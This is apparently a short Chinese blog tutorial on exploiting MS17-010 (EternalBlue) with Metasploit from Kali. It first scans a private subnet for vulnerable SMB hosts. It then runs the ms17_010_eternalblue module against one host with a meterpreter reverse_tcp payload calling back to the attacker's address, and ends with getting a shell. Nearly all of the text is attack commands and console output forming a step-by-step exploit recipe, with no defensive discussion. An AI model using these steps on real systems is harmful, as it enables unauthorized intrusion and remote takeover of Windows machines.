- 使用kali 对网段进行扫描,加载扫描模块:
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.15.1/24
rhosts => 192.168.15.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50
threads => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
扫描结果:可以看出192.168.15.164主机可以利用
- 加载攻击模块,攻击拿shell:
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //这个可以不写
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.15.164
rhosts => 192.168.15.164
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.15.174
lhost => 192.168.15.174
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
拿到shell:
metasploit对 ms17-010永恒之蓝的漏洞利用
最新推荐文章于 2023-08-02 15:13:18 发布